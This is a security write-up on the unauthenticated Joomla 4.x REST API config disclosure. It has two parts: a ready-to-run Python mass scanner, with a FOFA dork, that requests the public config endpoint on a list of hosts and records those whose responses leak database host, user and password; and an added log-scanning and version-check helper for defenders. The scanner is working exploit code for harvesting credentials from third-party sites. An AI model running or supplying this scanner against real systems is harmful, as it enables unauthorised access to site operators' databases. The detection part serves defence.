Approach for finding unauthenticated vulnerabilities:
Whether it is WordPress/RoundCube, phpMyAdmin, or other fairly well-known PHP applications (enough to make a Java security researcher's scalp tingle), my focus has become tracing the request-routing code. Once I have analysed what happens after route selection, I do not read the remaining business logic at all.
Joomla has roughly three routing entry points:
- index.php in the web root (visitors reading articles)
- administrator/index.php in the web root (administrator management)
- api/index.php in the web root (the REST API that developers love)
The unauthenticated endpoint is exactly the third entry point. Affected: Joomla 4.0.0 through Joomla 4.2.7 (the 4.x series in which the REST API was formally developed).
http://127.0.0.1/api/index.php/v1/config/application?public=true
```python
# fofa:product="Joomla"
from queue import Queue
from threading import Thread
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# endpoint of the third routing entry (api/index.php) checked by the script
BASE_URL = "/api/index.php/v1/config/application?public=true"


def write_Result(url):
    # append each matching URL to the result file
    with open("result.txt", "a", encoding="utf-8") as f:
        f.write(url + "\n")


def ReadFile(fQueue: Queue):
    # text.txt = the text file of hosts to read
    # a static path is used for this test
    with open(r"text.txt", "r", encoding="utf-8") as file:
        for line in file.readlines():
            f = line.replace("\n", "") + BASE_URL
            fQueue.put(f)


class A(Thread):
    def __init__(self, a):
        super(A, self).__init__()
        self.queue = a
        self.setDaemon(True)

    def run(self) -> None:
        try:
            # print(url)
            response = requests.get(self.queue, verify=False)
            # print("URL:{} STATUS:{}".format(response.url, response.status_code))
            # a 200 whose body carries host/user/password fields is recorded
            if response.status_code == 200 and response.text.find("host") != -1 and response.text.find("user") != -1 and response.text.find("password") != -1:
                write_Result(self.queue)
                print("URL:{} STATUS:{}".format(response.url, response.status_code))
        except Exception as e:
            pass


q = Queue()
ReadFile(q)
while True:
    url = q.get()
    A(url).start()
    if q.empty():
        break
```
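From the defender's side, the same routing observation tells you what to look for in web-server logs and which installations need patching. The following is an added example, not code from the original post: it flags requests to the config endpoint named above on Joomla's api/index.php entry point and checks whether a Joomla version string falls in the 4.0.0 to 4.2.7 range the post gives. The combined-log-format regex and the sample log lines are constructed for the example.

```python
"""Detection helper for the unauthenticated Joomla REST config endpoint.

Added example (not the original post's code). The endpoint path and the
affected version range come from the post; the log format regex and the
sample log lines below are constructed.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Config endpoint reachable through Joomla's third routing entry (api/index.php).
API_CONFIG_PATH = "/api/index.php/v1/config/application"
# Affected range stated in the post: Joomla 4.0.0 through 4.2.7 inclusive.
AFFECTED_MIN = (4, 0, 0)
AFFECTED_MAX = (4, 2, 7)

# Apache/nginx "combined" access-log line (constructed regex, common fields only).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r"(?P<status>\d{3}) (?P<size>\S+)"
)

# Constructed sample log lines: one ordinary article request, one hit on the
# public config endpoint that was served, one without public=true that was
# refused, and one administrator request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2023:10:00:01 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5123',
    '203.0.113.5 - - [10/Mar/2023:10:00:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 873',
    '198.51.100.7 - - [10/Mar/2023:10:00:03 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 120',
    '198.51.100.7 - - [10/Mar/2023:10:00:04 +0000] "GET /administrator/index.php HTTP/1.1" 200 3001',
]


def is_affected_version(version: str) -> bool:
    """True if a Joomla version string lies in 4.0.0 .. 4.2.7 inclusive."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unparseable version: {version}")
    parsed = tuple(int(x) for x in m.groups())
    return AFFECTED_MIN <= parsed <= AFFECTED_MAX


def classify_request(target: str) -> Optional[str]:
    """Label a request target that touches the config endpoint, else None."""
    parts = urlsplit(target)
    if parts.path.rstrip("/") != API_CONFIG_PATH:
        return None
    public = parse_qs(parts.query).get("public", [""])[0].lower()
    # public=true is the exact form the post shows; flag it separately.
    return "joomla-api-config-public" if public == "true" else "joomla-api-config"


def scan_log(lines: List[str]) -> List[dict]:
    """Return one finding per log line that requests the config endpoint.

    'served' is True when the server answered 200, i.e. the request was not
    rejected by the API's authorisation layer.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected format
        label = classify_request(m["target"])
        if label is None:
            continue
        findings.append(
            {
                "ip": m["ip"],
                "status": int(m["status"]),
                "label": label,
                "served": m["status"] == "200",
            }
        )
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print("4.2.7 affected:", is_affected_version("4.2.7"))
```

A finding with `served` set to True on a host whose version `is_affected_version` reports as affected is the combination worth triaging first; a 401 on the same path shows the authorisation layer did its job and is lower priority.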
Reference article: https://xz.aliyun.com/t/12175
Article backup: GitHub